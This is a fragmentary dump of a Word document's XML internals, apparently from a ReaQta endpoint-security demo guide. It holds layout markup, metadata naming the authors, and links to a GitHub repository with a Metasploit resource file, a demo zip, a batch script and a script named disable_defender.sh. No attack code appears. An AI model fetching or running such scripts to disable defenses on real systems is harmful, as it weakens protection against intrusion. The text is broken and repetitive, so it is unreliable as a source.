          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="501898316">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1574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0401">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="875776782">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1960453301">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="4426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0251">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1786122379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="454561142">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="583534953">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5345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52590">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2134859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w.githubusercontent.com/sudonim007/reaqta/main/msf_config.rc"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sudonim007/reaqta/raw/main/ReaQtaDemoFiles.zi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aw.githubusercontent.com/sudonim007/reaqta/main/fixGID.ba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aw.githubusercontent.com/sudonim007/reaqta/main/fixGID.bat"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elixmarks@uk.ibm.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udonim007/reaqta/main/disable_defender.sh"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31618C8-B3AD-499E-ACE5-1BBED06FD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14</Pages>
  <Words>2173</Words>
  <Characters>12390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Leighton</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>FELIX Marks</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2021-10-29T09:22:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-19T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-19T15:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>